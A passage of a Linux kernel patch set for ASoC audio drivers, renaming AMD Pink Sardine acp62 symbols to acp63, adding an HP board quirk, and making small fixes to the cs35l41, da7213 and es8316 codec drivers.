+ 	snd_soc_card_set_drvdata(card, machine);
+ 	ret = devm_snd_soc_register_card(&pdev->dev, card);
+@@ -64,15 +64,15 @@ static int acp62_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static struct platform_driver acp62_mach_driver = {
++static struct platform_driver acp63_mach_driver = {
+ 	.driver = {
+ 		.name = "acp_ps_mach",
+ 		.pm = &snd_soc_pm_ops,
+ 	},
+-	.probe = acp62_probe,
++	.probe = acp63_probe,
+ };
+ 
+-module_platform_driver(acp62_mach_driver);
++module_platform_driver(acp63_mach_driver);
+ 
+ MODULE_AUTHOR("Syed.SabaKareem@amd.com");
+ MODULE_LICENSE("GPL v2");
+diff --git a/sound/soc/amd/ps/ps-pdm-dma.c b/sound/soc/amd/ps/ps-pdm-dma.c
+index b207b726cd829..eea71a9d2ef1a 100644
+--- a/sound/soc/amd/ps/ps-pdm-dma.c
++++ b/sound/soc/amd/ps/ps-pdm-dma.c
+@@ -14,11 +14,11 @@
+ #include <sound/soc-dai.h>
+ #include <linux/pm_runtime.h>
+ 
+-#include "acp62.h"
++#include "acp63.h"
+ 
+ #define DRV_NAME "acp_ps_pdm_dma"
+ 
+-static const struct snd_pcm_hardware acp62_pdm_hardware_capture = {
++static const struct snd_pcm_hardware acp63_pdm_hardware_capture = {
+ 	.info = SNDRV_PCM_INFO_INTERLEAVED |
+ 		SNDRV_PCM_INFO_BLOCK_TRANSFER |
+ 		SNDRV_PCM_INFO_MMAP |
+@@ -37,61 +37,61 @@ static const struct snd_pcm_hardware acp62_pdm_hardware_capture = {
+ 	.periods_max = CAPTURE_MAX_NUM_PERIODS,
+ };
+ 
+-static void acp62_init_pdm_ring_buffer(u32 physical_addr, u32 buffer_size,
++static void acp63_init_pdm_ring_buffer(u32 physical_addr, u32 buffer_size,
+ 				       u32 watermark_size, void __iomem *acp_base)
+ {
+-	acp62_writel(physical_addr, acp_base + ACP_WOV_RX_RINGBUFADDR);
+-	acp62_writel(buffer_size, acp_base + ACP_WOV_RX_RINGBUFSIZE);
+-	acp62_writel(watermark_size, acp_base + ACP_WOV_RX_INTR_WATERMARK_SIZE);
+-	acp62_writel(0x01, acp_base + ACPAXI2AXI_ATU_CTRL);
++	acp63_writel(physical_addr, acp_base + ACP_WOV_RX_RINGBUFADDR);
++	acp63_writel(buffer_size, acp_base + ACP_WOV_RX_RINGBUFSIZE);
++	acp63_writel(watermark_size, acp_base + ACP_WOV_RX_INTR_WATERMARK_SIZE);
++	acp63_writel(0x01, acp_base + ACPAXI2AXI_ATU_CTRL);
+ }
+ 
+-static void acp62_enable_pdm_clock(void __iomem *acp_base)
++static void acp63_enable_pdm_clock(void __iomem *acp_base)
+ {
+ 	u32 pdm_clk_enable, pdm_ctrl;
+ 
+ 	pdm_clk_enable = ACP_PDM_CLK_FREQ_MASK;
+ 	pdm_ctrl = 0x00;
+ 
+-	acp62_writel(pdm_clk_enable, acp_base + ACP_WOV_CLK_CTRL);
+-	pdm_ctrl = acp62_readl(acp_base + ACP_WOV_MISC_CTRL);
++	acp63_writel(pdm_clk_enable, acp_base + ACP_WOV_CLK_CTRL);
++	pdm_ctrl = acp63_readl(acp_base + ACP_WOV_MISC_CTRL);
+ 	pdm_ctrl |= ACP_WOV_MISC_CTRL_MASK;
+-	acp62_writel(pdm_ctrl, acp_base + ACP_WOV_MISC_CTRL);
++	acp63_writel(pdm_ctrl, acp_base + ACP_WOV_MISC_CTRL);
+ }
+ 
+-static void acp62_enable_pdm_interrupts(void __iomem *acp_base)
++static void acp63_enable_pdm_interrupts(void __iomem *acp_base)
+ {
+ 	u32 ext_int_ctrl;
+ 
+-	ext_int_ctrl = acp62_readl(acp_base + ACP_EXTERNAL_INTR_CNTL);
++	ext_int_ctrl = acp63_readl(acp_base + ACP_EXTERNAL_INTR_CNTL);
+ 	ext_int_ctrl |= PDM_DMA_INTR_MASK;
+-	acp62_writel(ext_int_ctrl, acp_base + ACP_EXTERNAL_INTR_CNTL);
++	acp63_writel(ext_int_ctrl, acp_base + ACP_EXTERNAL_INTR_CNTL);
+ }
+ 
+-static void acp62_disable_pdm_interrupts(void __iomem *acp_base)
++static void acp63_disable_pdm_interrupts(void __iomem *acp_base)
+ {
+ 	u32 ext_int_ctrl;
+ 
+-	ext_int_ctrl = acp62_readl(acp_base + ACP_EXTERNAL_INTR_CNTL);
++	ext_int_ctrl = acp63_readl(acp_base + ACP_EXTERNAL_INTR_CNTL);
+ 	ext_int_ctrl &= ~PDM_DMA_INTR_MASK;
+-	acp62_writel(ext_int_ctrl, acp_base + ACP_EXTERNAL_INTR_CNTL);
++	acp63_writel(ext_int_ctrl, acp_base + ACP_EXTERNAL_INTR_CNTL);
+ }
+ 
+-static bool acp62_check_pdm_dma_status(void __iomem *acp_base)
++static bool acp63_check_pdm_dma_status(void __iomem *acp_base)
+ {
+ 	bool pdm_dma_status;
+ 	u32 pdm_enable, pdm_dma_enable;
+ 
+ 	pdm_dma_status = false;
+-	pdm_enable = acp62_readl(acp_base + ACP_WOV_PDM_ENABLE);
+-	pdm_dma_enable = acp62_readl(acp_base + ACP_WOV_PDM_DMA_ENABLE);
++	pdm_enable = acp63_readl(acp_base + ACP_WOV_PDM_ENABLE);
++	pdm_dma_enable = acp63_readl(acp_base + ACP_WOV_PDM_DMA_ENABLE);
+ 	if ((pdm_enable & ACP_PDM_ENABLE) && (pdm_dma_enable & ACP_PDM_DMA_EN_STATUS))
+ 		pdm_dma_status = true;
+ 
+ 	return pdm_dma_status;
+ }
+ 
+-static int acp62_start_pdm_dma(void __iomem *acp_base)
++static int acp63_start_pdm_dma(void __iomem *acp_base)
+ {
+ 	u32 pdm_enable;
+ 	u32 pdm_dma_enable;
+@@ -100,12 +100,12 @@ static int acp62_start_pdm_dma(void __iomem *acp_base)
+ 	pdm_enable = 0x01;
+ 	pdm_dma_enable  = 0x01;
+ 
+-	acp62_enable_pdm_clock(acp_base);
+-	acp62_writel(pdm_enable, acp_base + ACP_WOV_PDM_ENABLE);
+-	acp62_writel(pdm_dma_enable, acp_base + ACP_WOV_PDM_DMA_ENABLE);
++	acp63_enable_pdm_clock(acp_base);
++	acp63_writel(pdm_enable, acp_base + ACP_WOV_PDM_ENABLE);
++	acp63_writel(pdm_dma_enable, acp_base + ACP_WOV_PDM_DMA_ENABLE);
+ 	timeout = 0;
+ 	while (++timeout < ACP_COUNTER) {
+-		pdm_dma_enable = acp62_readl(acp_base + ACP_WOV_PDM_DMA_ENABLE);
++		pdm_dma_enable = acp63_readl(acp_base + ACP_WOV_PDM_DMA_ENABLE);
+ 		if ((pdm_dma_enable & 0x02) == ACP_PDM_DMA_EN_STATUS)
+ 			return 0;
+ 		udelay(DELAY_US);
+@@ -113,7 +113,7 @@ static int acp62_start_pdm_dma(void __iomem *acp_base)
+ 	return -ETIMEDOUT;
+ }
+ 
+-static int acp62_stop_pdm_dma(void __iomem *acp_base)
++static int acp63_stop_pdm_dma(void __iomem *acp_base)
+ {
+ 	u32 pdm_enable, pdm_dma_enable;
+ 	int timeout;
+@@ -121,14 +121,14 @@ static int acp62_stop_pdm_dma(void __iomem *acp_base)
+ 	pdm_enable = 0x00;
+ 	pdm_dma_enable  = 0x00;
+ 
+-	pdm_enable = acp62_readl(acp_base + ACP_WOV_PDM_ENABLE);
+-	pdm_dma_enable = acp62_readl(acp_base + ACP_WOV_PDM_DMA_ENABLE);
++	pdm_enable = acp63_readl(acp_base + ACP_WOV_PDM_ENABLE);
++	pdm_dma_enable = acp63_readl(acp_base + ACP_WOV_PDM_DMA_ENABLE);
+ 	if (pdm_dma_enable & 0x01) {
+ 		pdm_dma_enable = 0x02;
+-		acp62_writel(pdm_dma_enable, acp_base + ACP_WOV_PDM_DMA_ENABLE);
++		acp63_writel(pdm_dma_enable, acp_base + ACP_WOV_PDM_DMA_ENABLE);
+ 		timeout = 0;
+ 		while (++timeout < ACP_COUNTER) {
+-			pdm_dma_enable = acp62_readl(acp_base + ACP_WOV_PDM_DMA_ENABLE);
++			pdm_dma_enable = acp63_readl(acp_base + ACP_WOV_PDM_DMA_ENABLE);
+ 			if ((pdm_dma_enable & 0x02) == 0x00)
+ 				break;
+ 			udelay(DELAY_US);
+@@ -138,13 +138,13 @@ static int acp62_stop_pdm_dma(void __iomem *acp_base)
+ 	}
+ 	if (pdm_enable == ACP_PDM_ENABLE) {
+ 		pdm_enable = ACP_PDM_DISABLE;
+-		acp62_writel(pdm_enable, acp_base + ACP_WOV_PDM_ENABLE);
++		acp63_writel(pdm_enable, acp_base + ACP_WOV_PDM_ENABLE);
+ 	}
+-	acp62_writel(0x01, acp_base + ACP_WOV_PDM_FIFO_FLUSH);
++	acp63_writel(0x01, acp_base + ACP_WOV_PDM_FIFO_FLUSH);
+ 	return 0;
+ }
+ 
+-static void acp62_config_dma(struct pdm_stream_instance *rtd, int direction)
++static void acp63_config_dma(struct pdm_stream_instance *rtd, int direction)
+ {
+ 	u16 page_idx;
+ 	u32 low, high, val;
+@@ -154,24 +154,24 @@ static void acp62_config_dma(struct pdm_stream_instance *rtd, int direction)
+ 	val = PDM_PTE_OFFSET;
+ 
+ 	/* Group Enable */
+-	acp62_writel(ACP_SRAM_PTE_OFFSET | BIT(31), rtd->acp62_base +
++	acp63_writel(ACP_SRAM_PTE_OFFSET | BIT(31), rtd->acp63_base +
+ 		     ACPAXI2AXI_ATU_BASE_ADDR_GRP_1);
+-	acp62_writel(PAGE_SIZE_4K_ENABLE, rtd->acp62_base +
++	acp63_writel(PAGE_SIZE_4K_ENABLE, rtd->acp63_base +
+ 		     ACPAXI2AXI_ATU_PAGE_SIZE_GRP_1);
+ 	for (page_idx = 0; page_idx < rtd->num_pages; page_idx++) {
+ 		/* Load the low address of page int ACP SRAM through SRBM */
+ 		low = lower_32_bits(addr);
+ 		high = upper_32_bits(addr);
+ 
+-		acp62_writel(low, rtd->acp62_base + ACP_SCRATCH_REG_0 + val);
++		acp63_writel(low, rtd->acp63_base + ACP_SCRATCH_REG_0 + val);
+ 		high |= BIT(31);
+-		acp62_writel(high, rtd->acp62_base + ACP_SCRATCH_REG_0 + val + 4);
++		acp63_writel(high, rtd->acp63_base + ACP_SCRATCH_REG_0 + val + 4);
+ 		val += 8;
+ 		addr += PAGE_SIZE;
+ 	}
+ }
+ 
+-static int acp62_pdm_dma_open(struct snd_soc_component *component,
++static int acp63_pdm_dma_open(struct snd_soc_component *component,
+ 			      struct snd_pcm_substream *substream)
+ {
+ 	struct snd_pcm_runtime *runtime;
+@@ -186,7 +186,7 @@ static int acp62_pdm_dma_open(struct snd_soc_component *component,
+ 		return -EINVAL;
+ 
+ 	if (substream->stream == SNDRV_PCM_STREAM_CAPTURE)
+-		runtime->hw = acp62_pdm_hardware_capture;
++		runtime->hw = acp63_pdm_hardware_capture;
+ 
+ 	ret = snd_pcm_hw_constraint_integer(runtime,
+ 					    SNDRV_PCM_HW_PARAM_PERIODS);
+@@ -196,17 +196,17 @@ static int acp62_pdm_dma_open(struct snd_soc_component *component,
+ 		return ret;
+ 	}
+ 
+-	acp62_enable_pdm_interrupts(adata->acp62_base);
++	acp63_enable_pdm_interrupts(adata->acp63_base);
+ 
+ 	if (substream->stream == SNDRV_PCM_STREAM_CAPTURE)
+ 		adata->capture_stream = substream;
+ 
+-	pdm_data->acp62_base = adata->acp62_base;
++	pdm_data->acp63_base = adata->acp63_base;
+ 	runtime->private_data = pdm_data;
+ 	return ret;
+ }
+ 
+-static int acp62_pdm_dma_hw_params(struct snd_soc_component *component,
++static int acp63_pdm_dma_hw_params(struct snd_soc_component *component,
+ 				   struct snd_pcm_substream *substream,
+ 				   struct snd_pcm_hw_params *params)
+ {
+@@ -220,26 +220,26 @@ static int acp62_pdm_dma_hw_params(struct snd_soc_component *component,
+ 	period_bytes = params_period_bytes(params);
+ 	rtd->dma_addr = substream->runtime->dma_addr;
+ 	rtd->num_pages = (PAGE_ALIGN(size) >> PAGE_SHIFT);
+-	acp62_config_dma(rtd, substream->stream);
+-	acp62_init_pdm_ring_buffer(PDM_MEM_WINDOW_START, size,
+-				   period_bytes, rtd->acp62_base);
++	acp63_config_dma(rtd, substream->stream);
++	acp63_init_pdm_ring_buffer(PDM_MEM_WINDOW_START, size,
++				   period_bytes, rtd->acp63_base);
+ 	return 0;
+ }
+ 
+-static u64 acp62_pdm_get_byte_count(struct pdm_stream_instance *rtd,
++static u64 acp63_pdm_get_byte_count(struct pdm_stream_instance *rtd,
+ 				    int direction)
+ {
+ 	u32 high, low;
+ 	u64 byte_count;
+ 
+-	high = acp62_readl(rtd->acp62_base + ACP_WOV_RX_LINEARPOSITIONCNTR_HIGH);
++	high = acp63_readl(rtd->acp63_base + ACP_WOV_RX_LINEARPOSITIONCNTR_HIGH);
+ 	byte_count = high;
+-	low = acp62_readl(rtd->acp62_base + ACP_WOV_RX_LINEARPOSITIONCNTR_LOW);
++	low = acp63_readl(rtd->acp63_base + ACP_WOV_RX_LINEARPOSITIONCNTR_LOW);
+ 	byte_count = (byte_count << 32) | low;
+ 	return byte_count;
+ }
+ 
+-static snd_pcm_uframes_t acp62_pdm_dma_pointer(struct snd_soc_component *comp,
++static snd_pcm_uframes_t acp63_pdm_dma_pointer(struct snd_soc_component *comp,
+ 					       struct snd_pcm_substream *stream)
+ {
+ 	struct pdm_stream_instance *rtd;
+@@ -249,14 +249,14 @@ static snd_pcm_uframes_t acp62_pdm_dma_pointer(struct snd_soc_component *comp,
+ 	rtd = stream->runtime->private_data;
+ 	buffersize = frames_to_bytes(stream->runtime,
+ 				     stream->runtime->buffer_size);
+-	bytescount = acp62_pdm_get_byte_count(rtd, stream->stream);
++	bytescount = acp63_pdm_get_byte_count(rtd, stream->stream);
+ 	if (bytescount > rtd->bytescount)
+ 		bytescount -= rtd->bytescount;
+ 	pos = do_div(bytescount, buffersize);
+ 	return bytes_to_frames(stream->runtime, pos);
+ }
+ 
+-static int acp62_pdm_dma_new(struct snd_soc_component *component,
++static int acp63_pdm_dma_new(struct snd_soc_component *component,
+ 			     struct snd_soc_pcm_runtime *rtd)
+ {
+ 	struct device *parent = component->dev->parent;
+@@ -266,19 +266,19 @@ static int acp62_pdm_dma_new(struct snd_soc_component *component,
+ 	return 0;
+ }
+ 
+-static int acp62_pdm_dma_close(struct snd_soc_component *component,
++static int acp63_pdm_dma_close(struct snd_soc_component *component,
+ 			       struct snd_pcm_substream *substream)
+ {
+ 	struct pdm_dev_data *adata = dev_get_drvdata(component->dev);
+ 	struct snd_pcm_runtime *runtime = substream->runtime;
+ 
+-	acp62_disable_pdm_interrupts(adata->acp62_base);
++	acp63_disable_pdm_interrupts(adata->acp63_base);
+ 	adata->capture_stream = NULL;
+ 	kfree(runtime->private_data);
+ 	return 0;
+ }
+ 
+-static int acp62_pdm_dai_trigger(struct snd_pcm_substream *substream,
++static int acp63_pdm_dai_trigger(struct snd_pcm_substream *substream,
+ 				 int cmd, struct snd_soc_dai *dai)
+ {
+ 	struct pdm_stream_instance *rtd;
+@@ -299,20 +299,20 @@ static int acp62_pdm_dai_trigger(struct snd_pcm_substream *substream,
+ 	case SNDRV_PCM_TRIGGER_START:
+ 	case SNDRV_PCM_TRIGGER_RESUME:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_RELEASE:
+-		acp62_writel(ch_mask, rtd->acp62_base + ACP_WOV_PDM_NO_OF_CHANNELS);
+-		acp62_writel(PDM_DECIMATION_FACTOR, rtd->acp62_base +
++		acp63_writel(ch_mask, rtd->acp63_base + ACP_WOV_PDM_NO_OF_CHANNELS);
++		acp63_writel(PDM_DECIMATION_FACTOR, rtd->acp63_base +
+ 			     ACP_WOV_PDM_DECIMATION_FACTOR);
+-		rtd->bytescount = acp62_pdm_get_byte_count(rtd, substream->stream);
+-		pdm_status = acp62_check_pdm_dma_status(rtd->acp62_base);
++		rtd->bytescount = acp63_pdm_get_byte_count(rtd, substream->stream);
++		pdm_status = acp63_check_pdm_dma_status(rtd->acp63_base);
+ 		if (!pdm_status)
+-			ret = acp62_start_pdm_dma(rtd->acp62_base);
++			ret = acp63_start_pdm_dma(rtd->acp63_base);
+ 		break;
+ 	case SNDRV_PCM_TRIGGER_STOP:
+ 	case SNDRV_PCM_TRIGGER_SUSPEND:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_PUSH:
+-		pdm_status = acp62_check_pdm_dma_status(rtd->acp62_base);
++		pdm_status = acp63_check_pdm_dma_status(rtd->acp63_base);
+ 		if (pdm_status)
+-			ret = acp62_stop_pdm_dma(rtd->acp62_base);
++			ret = acp63_stop_pdm_dma(rtd->acp63_base);
+ 		break;
+ 	default:
+ 		ret = -EINVAL;
+@@ -321,11 +321,11 @@ static int acp62_pdm_dai_trigger(struct snd_pcm_substream *substream,
+ 	return ret;
+ }
+ 
+-static const struct snd_soc_dai_ops acp62_pdm_dai_ops = {
+-	.trigger   = acp62_pdm_dai_trigger,
++static const struct snd_soc_dai_ops acp63_pdm_dai_ops = {
++	.trigger   = acp63_pdm_dai_trigger,
+ };
+ 
+-static struct snd_soc_dai_driver acp62_pdm_dai_driver = {
++static struct snd_soc_dai_driver acp63_pdm_dai_driver = {
+ 	.name = "acp_ps_pdm_dma.0",
+ 	.capture = {
+ 		.rates = SNDRV_PCM_RATE_48000,
+@@ -335,19 +335,19 @@ static struct snd_soc_dai_driver acp62_pdm_dai_driver = {
+ 		.rate_min = 48000,
+ 		.rate_max = 48000,
+ 	},
+-	.ops = &acp62_pdm_dai_ops,
++	.ops = &acp63_pdm_dai_ops,
+ };
+ 
+-static const struct snd_soc_component_driver acp62_pdm_component = {
++static const struct snd_soc_component_driver acp63_pdm_component = {
+ 	.name		= DRV_NAME,
+-	.open		= acp62_pdm_dma_open,
+-	.close		= acp62_pdm_dma_close,
+-	.hw_params	= acp62_pdm_dma_hw_params,
+-	.pointer	= acp62_pdm_dma_pointer,
+-	.pcm_construct	= acp62_pdm_dma_new,
++	.open		= acp63_pdm_dma_open,
++	.close		= acp63_pdm_dma_close,
++	.hw_params	= acp63_pdm_dma_hw_params,
++	.pointer	= acp63_pdm_dma_pointer,
++	.pcm_construct	= acp63_pdm_dma_new,
+ };
+ 
+-static int acp62_pdm_audio_probe(struct platform_device *pdev)
++static int acp63_pdm_audio_probe(struct platform_device *pdev)
+ {
+ 	struct resource *res;
+ 	struct pdm_dev_data *adata;
+@@ -363,16 +363,16 @@ static int acp62_pdm_audio_probe(struct platform_device *pdev)
+ 	if (!adata)
+ 		return -ENOMEM;
+ 
+-	adata->acp62_base = devm_ioremap(&pdev->dev, res->start, resource_size(res));
+-	if (!adata->acp62_base)
++	adata->acp63_base = devm_ioremap(&pdev->dev, res->start, resource_size(res));
++	if (!adata->acp63_base)
+ 		return -ENOMEM;
+ 
+ 	adata->capture_stream = NULL;
+ 
+ 	dev_set_drvdata(&pdev->dev, adata);
+ 	status = devm_snd_soc_register_component(&pdev->dev,
+-						 &acp62_pdm_component,
+-						 &acp62_pdm_dai_driver, 1);
++						 &acp63_pdm_component,
++						 &acp63_pdm_dai_driver, 1);
+ 	if (status) {
+ 		dev_err(&pdev->dev, "Fail to register acp pdm dai\n");
+ 
+@@ -385,13 +385,13 @@ static int acp62_pdm_audio_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static int acp62_pdm_audio_remove(struct platform_device *pdev)
++static int acp63_pdm_audio_remove(struct platform_device *pdev)
+ {
+ 	pm_runtime_disable(&pdev->dev);
+ 	return 0;
+ }
+ 
+-static int __maybe_unused acp62_pdm_resume(struct device *dev)
++static int __maybe_unused acp63_pdm_resume(struct device *dev)
+ {
+ 	struct pdm_dev_data *adata;
+ 	struct snd_pcm_runtime *runtime;
+@@ -404,47 +404,47 @@ static int __maybe_unused acp62_pdm_resume(struct device *dev)
+ 		rtd = runtime->private_data;
+ 		period_bytes = frames_to_bytes(runtime, runtime->period_size);
+ 		buffer_len = frames_to_bytes(runtime, runtime->buffer_size);
+-		acp62_config_dma(rtd, SNDRV_PCM_STREAM_CAPTURE);
+-		acp62_init_pdm_ring_buffer(PDM_MEM_WINDOW_START, buffer_len,
+-					   period_bytes, adata->acp62_base);
++		acp63_config_dma(rtd, SNDRV_PCM_STREAM_CAPTURE);
++		acp63_init_pdm_ring_buffer(PDM_MEM_WINDOW_START, buffer_len,
++					   period_bytes, adata->acp63_base);
+ 	}
+-	acp62_enable_pdm_interrupts(adata->acp62_base);
++	acp63_enable_pdm_interrupts(adata->acp63_base);
+ 	return 0;
+ }
+ 
+-static int __maybe_unused acp62_pdm_suspend(struct device *dev)
++static int __maybe_unused acp63_pdm_suspend(struct device *dev)
+ {
+ 	struct pdm_dev_data *adata;
+ 
+ 	adata = dev_get_drvdata(dev);
+-	acp62_disable_pdm_interrupts(adata->acp62_base);
++	acp63_disable_pdm_interrupts(adata->acp63_base);
+ 	return 0;
+ }
+ 
+-static int __maybe_unused acp62_pdm_runtime_resume(struct device *dev)
++static int __maybe_unused acp63_pdm_runtime_resume(struct device *dev)
+ {
+ 	struct pdm_dev_data *adata;
+ 
+ 	adata = dev_get_drvdata(dev);
+-	acp62_enable_pdm_interrupts(adata->acp62_base);
++	acp63_enable_pdm_interrupts(adata->acp63_base);
+ 	return 0;
+ }
+ 
+-static const struct dev_pm_ops acp62_pdm_pm_ops = {
+-	SET_RUNTIME_PM_OPS(acp62_pdm_suspend, acp62_pdm_runtime_resume, NULL)
+-	SET_SYSTEM_SLEEP_PM_OPS(acp62_pdm_suspend, acp62_pdm_resume)
++static const struct dev_pm_ops acp63_pdm_pm_ops = {
++	SET_RUNTIME_PM_OPS(acp63_pdm_suspend, acp63_pdm_runtime_resume, NULL)
++	SET_SYSTEM_SLEEP_PM_OPS(acp63_pdm_suspend, acp63_pdm_resume)
+ };
+ 
+-static struct platform_driver acp62_pdm_dma_driver = {
+-	.probe = acp62_pdm_audio_probe,
+-	.remove = acp62_pdm_audio_remove,
++static struct platform_driver acp63_pdm_dma_driver = {
++	.probe = acp63_pdm_audio_probe,
++	.remove = acp63_pdm_audio_remove,
+ 	.driver = {
+ 		.name = "acp_ps_pdm_dma",
+-		.pm = &acp62_pdm_pm_ops,
++		.pm = &acp63_pdm_pm_ops,
+ 	},
+ };
+ 
+-module_platform_driver(acp62_pdm_dma_driver);
++module_platform_driver(acp63_pdm_dma_driver);
+ 
+ MODULE_AUTHOR("Syed.SabaKareem@amd.com");
+ MODULE_DESCRIPTION("AMD PINK SARDINE PDM Driver");
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 4a69ce702360c..0acdf0156f075 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -269,6 +269,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "8A43"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
++			DMI_MATCH(DMI_BOARD_NAME, "8A22"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/sound/soc/codecs/cs35l41.c b/sound/soc/codecs/cs35l41.c
+index c223d83e02cfb..f2b5032daa6ae 100644
+--- a/sound/soc/codecs/cs35l41.c
++++ b/sound/soc/codecs/cs35l41.c
+@@ -356,6 +356,19 @@ static const struct snd_kcontrol_new cs35l41_aud_controls[] = {
+ 	WM_ADSP_FW_CONTROL("DSP1", 0),
+ };
+ 
++static void cs35l41_boost_enable(struct cs35l41_private *cs35l41, unsigned int enable)
++{
++	switch (cs35l41->hw_cfg.bst_type) {
++	case CS35L41_INT_BOOST:
++		enable = enable ? CS35L41_BST_EN_DEFAULT : CS35L41_BST_DIS_FET_OFF;
++		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2, CS35L41_BST_EN_MASK,
++				enable << CS35L41_BST_EN_SHIFT);
++		break;
++	default:
++		break;
++	}
++}
++
+ static irqreturn_t cs35l41_irq(int irq, void *data)
+ {
+ 	struct cs35l41_private *cs35l41 = data;
+@@ -431,8 +444,7 @@ static irqreturn_t cs35l41_irq(int irq, void *data)
+ 
+ 	if (status[0] & CS35L41_BST_OVP_ERR) {
+ 		dev_crit_ratelimited(cs35l41->dev, "VBST Over Voltage error\n");
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK, 0);
++		cs35l41_boost_enable(cs35l41, 0);
+ 		regmap_write(cs35l41->regmap, CS35L41_IRQ1_STATUS1,
+ 			     CS35L41_BST_OVP_ERR);
+ 		regmap_write(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN, 0);
+@@ -441,16 +453,13 @@ static irqreturn_t cs35l41_irq(int irq, void *data)
+ 				   CS35L41_BST_OVP_ERR_RLS);
+ 		regmap_update_bits(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN,
+ 				   CS35L41_BST_OVP_ERR_RLS, 0);
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK,
+-				   CS35L41_BST_EN_DEFAULT << CS35L41_BST_EN_SHIFT);
++		cs35l41_boost_enable(cs35l41, 1);
+ 		ret = IRQ_HANDLED;
+ 	}
+ 
+ 	if (status[0] & CS35L41_BST_DCM_UVP_ERR) {
+ 		dev_crit_ratelimited(cs35l41->dev, "DCM VBST Under Voltage Error\n");
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK, 0);
++		cs35l41_boost_enable(cs35l41, 0);
+ 		regmap_write(cs35l41->regmap, CS35L41_IRQ1_STATUS1,
+ 			     CS35L41_BST_DCM_UVP_ERR);
+ 		regmap_write(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN, 0);
+@@ -459,16 +468,13 @@ static irqreturn_t cs35l41_irq(int irq, void *data)
+ 				   CS35L41_BST_UVP_ERR_RLS);
+ 		regmap_update_bits(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN,
+ 				   CS35L41_BST_UVP_ERR_RLS, 0);
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK,
+-				   CS35L41_BST_EN_DEFAULT << CS35L41_BST_EN_SHIFT);
++		cs35l41_boost_enable(cs35l41, 1);
+ 		ret = IRQ_HANDLED;
+ 	}
+ 
+ 	if (status[0] & CS35L41_BST_SHORT_ERR) {
+ 		dev_crit_ratelimited(cs35l41->dev, "LBST error: powering off!\n");
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK, 0);
++		cs35l41_boost_enable(cs35l41, 0);
+ 		regmap_write(cs35l41->regmap, CS35L41_IRQ1_STATUS1,
+ 			     CS35L41_BST_SHORT_ERR);
+ 		regmap_write(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN, 0);
+@@ -477,9 +483,7 @@ static irqreturn_t cs35l41_irq(int irq, void *data)
+ 				   CS35L41_BST_SHORT_ERR_RLS);
+ 		regmap_update_bits(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN,
+ 				   CS35L41_BST_SHORT_ERR_RLS, 0);
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK,
+-				   CS35L41_BST_EN_DEFAULT << CS35L41_BST_EN_SHIFT);
++		cs35l41_boost_enable(cs35l41, 1);
+ 		ret = IRQ_HANDLED;
+ 	}
+ 
+diff --git a/sound/soc/codecs/da7213.c b/sound/soc/codecs/da7213.c
+index 544ccbcfc8844..5678683c71bee 100644
+--- a/sound/soc/codecs/da7213.c
++++ b/sound/soc/codecs/da7213.c
+@@ -1996,6 +1996,11 @@ static int da7213_i2c_probe(struct i2c_client *i2c)
+ 	return ret;
+ }
+ 
++static void da7213_i2c_remove(struct i2c_client *i2c)
++{
++	pm_runtime_disable(&i2c->dev);
++}
++
+ static int __maybe_unused da7213_runtime_suspend(struct device *dev)
+ {
+ 	struct da7213_priv *da7213 = dev_get_drvdata(dev);
+@@ -2039,6 +2044,7 @@ static struct i2c_driver da7213_i2c_driver = {
+ 		.pm = &da7213_pm,
+ 	},
+ 	.probe_new	= da7213_i2c_probe,
++	.remove		= da7213_i2c_remove,
+ 	.id_table	= da7213_i2c_id,
+ };
+ 
+diff --git a/sound/soc/codecs/es8316.c b/sound/soc/codecs/es8316.c
+index 056c3082fe02c..f7d7a9c91e04c 100644
+--- a/sound/soc/codecs/es8316.c
++++ b/sound/soc/codecs/es8316.c
+@@ -842,12 +842,14 @@ static int es8316_i2c_probe(struct i2c_client *i2c_client)
+ 	es8316->irq = i2c_client->irq;
+ 	mutex_init(&es8316->lock);
+ 
+-	ret = devm_request_threaded_irq(dev, es8316->irq, NULL, es8316_irq,
+-					IRQF_TRIGGER_HIGH | IRQF_ONESHOT | IRQF_NO_AUTOEN,
+-					"es8316", es8316);
+-	if (ret) {
+-		dev_warn(dev, "Failed to get IRQ %d: %d\n", es8316->irq, ret);
+-		es8316->irq = -ENXIO;
++	if (es8316->irq > 0) {
++		ret = devm_request_threaded_irq(dev, es8316->irq, NULL, es8316_irq,
++						IRQF_TRIGGER_HIGH | IRQF_ONESHOT | IRQF_NO_AUTOEN,
++						"es8316", es8316);
++		if (ret) {
++			dev_warn(dev, "Failed to get IRQ %d: %d\n", es8316->irq, ret);
++			es8316->irq = -ENXIO;
++		}
+ 	}
+ 
+ 	return devm_snd_soc_register_component(&i2c_client->dev,
+diff --git a/sound/soc/fsl/fsl_mqs.c b/sound/soc/fsl/fsl_mqs.c
